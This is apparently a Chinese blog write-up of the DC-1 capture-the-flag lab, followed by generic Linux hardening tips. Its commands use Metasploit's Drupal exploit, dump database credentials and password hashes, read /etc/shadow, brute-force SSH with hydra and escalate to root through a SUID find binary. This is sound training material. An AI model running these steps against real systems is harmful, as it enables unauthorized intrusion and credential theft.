DC-1靶场渗透

主机发现

通过下面的命令来发现dc-1靶机的IP地址

arp-scan -l

其中192.168.1.125就是dc-1的IP

接着使用nmap对这个ip进行扫描

nmap -A -p- 192.168.1.125

扫描发现该ip开放了22,80,111这几个端口

漏洞分析

其中80端口开放了一个http类的web网页,接着用浏览器访问这个80端口

发现是一个drupal site,进过信息搜集,发现这是一个通过php编写的开源内容管理框架,是一个附带cms的php开发框架

漏洞利用

并且可以在kali中的msf搜索到这个框架漏洞,接着启动msfconsole,然后启动成功后搜索drupal这个框架的漏洞

接着利用use来使用序好号1这个框架漏洞的脚本,顺便查看一下这个脚本的参数信息

image-20241119185253212

参数信息中只需要配置rhosts,然后再运行

通过python中的pty来对命令行进行具体化

python -c 'import pty;pty.spawn("/bin/bash")'

flag1

发现了flag1

进行读取后,说每个cms都需要一个配置文件,因此,要查看配置文件,在一遍遍的目录遍历中看到了配置文件

接着进行读取,在文件开头发现了mysql数据库的登录密码和账号,甚至还有数据库名

flag2

并且在这个setting中发现了flag2

暴力破解和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。您可以使用这些凭据做什么?

大概意思就是要我们进行提权,才能获得一些信息

连接数据库

接着使用该用户名和密码进行连接数据库

mysql -udbuser -pR0ck3t;

登录成功,接着看给出提到的数据库名

use drupaldb;
show tables;

列出drupaldb下的数据表后,发现了一个users表,进行查看

select * from users;

发现这个表中的pass都是经过hash加密的,很难破解,可以尝试自己生成一个经过hash加密的密码,再进行登陆

exit(退出数据库)
cd /var/www 返回最开始的目录
php scripts/passwod-hash.hash (root)--->自己的密码

先重复之前查看users表的操作,再接着用刚设置的密码进行登陆

update users set pass="$S$DkdKoDM3LYlch2HnKOplK/Fearq/.KlX6aO/WseXfy2HepVvzwA1" where uid=1;

然后我们就可以通过这个密码,在浏览器中进行登陆了

进行登陆

根据刚才的密码进行登陆

flag3

在一顿操作下发现了flag3

查看这个flag3

这句话就passwd和shadow有作用,在linux中这两个内容放到了/etc下

flag4

第一个:提权

接着进行访问

/etc/passwd
/etc/shadow

有flag4这个用户,但是需要进行爆破,或者是提权才能拿到flag4

尝试直接读取flag4

cat /home/flag4/flag4.txt

提示我们要用root用户才可以读取

find / -perm -4000

接着用find查找有没有可以进行提权的内容

发现可以通过ssh进行登陆,接着进行提权操作

find ./misc -exec "/bin/sh" \;

现在我们已经是root权限了

第二种:暴力破解

Kali自带的一个hydra软件可以对目标内容进行爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.125 ssh -vV -f 

其中-l表示指定爆破的用户,-P表示指定使用哪个密码字典,ip为DC1的ip,因为flag4可以进行ssh连接,所以利用ssh协议做爆破。

爆出了密码为orange,进行ssh连接

ssh flag4@192.168.1.125

也需要进行提权

重复第一步的命令即可,利用下面的命令进行提权

find / -perm -4000 2>/dev/null
find -exec /bin/sh \;

flag5

进入到root目录中,ls后发现了最后的flag,接着cat读取

cat thefinalflag.txt

在进行Linux DC-2靶场渗透测试后,为了确保系统的安全性,需要对发现的漏洞进行修复。以下是一些常见的漏洞修复建议: 1. **更新系统和软件包**: - 定期更新操作系统和所有安装的软件包,以修补已知的安全漏洞。 - 使用包管理工具(如`apt`或`yum`)进行更新: ```bash sudo apt update && sudo apt upgrade -y ``` 2. **禁用不必要的服务**: - 关闭系统中不必要的服务和端口,减少攻击面。 - 使用`systemctl`命令管理服务: ```bash sudo systemctl disable <service_name> sudo systemctl stop <service_name> ``` 3. **配置防火墙**: - 设置防火墙规则,只允许必要的流量通过。 - 使用`ufw`或`iptables`配置防火墙: ```bash sudo ufw allow <port>/<protocol> sudo ufw enable ``` 4. **强化SSH配置**: - 禁用root用户远程登录。 - 更改默认SSH端口。 - 使用密钥认证而不是密码认证。 - 编辑`/etc/ssh/sshd_config`文件: ```bash PermitRootLogin no Port <new_port> PasswordAuthentication no ``` 5. **设置强密码策略**: - 强制用户设置复杂密码,并定期更换。 - 使用`pam_cracklib`或`pam_pwquality`模块配置密码策略: ```bash sudo apt install libpam-pwquality sudo vi /etc/pam.d/common-password ``` 6. **安装和配置入侵检测系统(IDS)**: - 安装如`Fail2Ban`或`Snort`等工具,监控和阻止可疑活动。 - 配置`Fail2Ban`防止暴力破解: ```bash sudo apt install fail2ban sudo vi /etc/fail2ban/jail.local ``` 7. **日志监控和分析**: - 定期检查系统日志,监控异常活动。 - 使用工具如`Logwatch`或`Splunk`进行日志分析: ```bash sudo apt install logwatch sudo vi /etc/logwatch/conf/logwatch.conf ``` 8. **文件权限和所有权**: - 确保文件和目录的权限和所有权设置正确,防止未授权访问。 - 使用`chmod`和`chown`命令修改权限和所有权: ```bash sudo chmod 644 <file> sudo chown <user>:<group> <file> ``` 9. **数据备份和恢复**: - 定期备份重要数据,并测试恢复过程。 - 使用工具如`rsync`或`tar`进行备份: ```bash sudo rsync -av --delete /data /backup ``` 通过以上措施,可以有效降低Linux DC-2靶场渗透测试中暴露的风险,确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值